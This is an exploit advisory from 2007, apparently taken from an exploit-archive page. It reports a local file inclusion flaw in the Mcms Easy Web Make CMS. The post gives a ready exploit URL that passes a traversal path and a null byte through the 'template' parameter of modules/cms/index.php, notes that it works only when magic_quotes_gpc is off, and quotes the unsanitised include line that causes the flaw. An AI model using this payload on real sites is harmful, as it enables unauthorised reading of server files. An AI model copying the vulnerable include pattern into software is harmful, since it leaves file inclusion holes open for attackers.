[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mcms Easy Web Make (index.php template) Local File Inclusion Vuln
# Published : 2007-12-11
# Author : MhZ91
# Previous Title : Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability
# Next Title : SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Mcms Easy Web Make - Local File Inclusion
# Download: http://sourceforge.net/projects/easywebmake/
# Bug: Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Only If magic_quotes_gpc is Off
Exploit: http://[site]/modules/cms/index.php?template=[LFI]%00
Vuln Code: include"includes/$template/template.config.php";
---------------------------------------------------------------
# www.Syue.com [2007-12-11]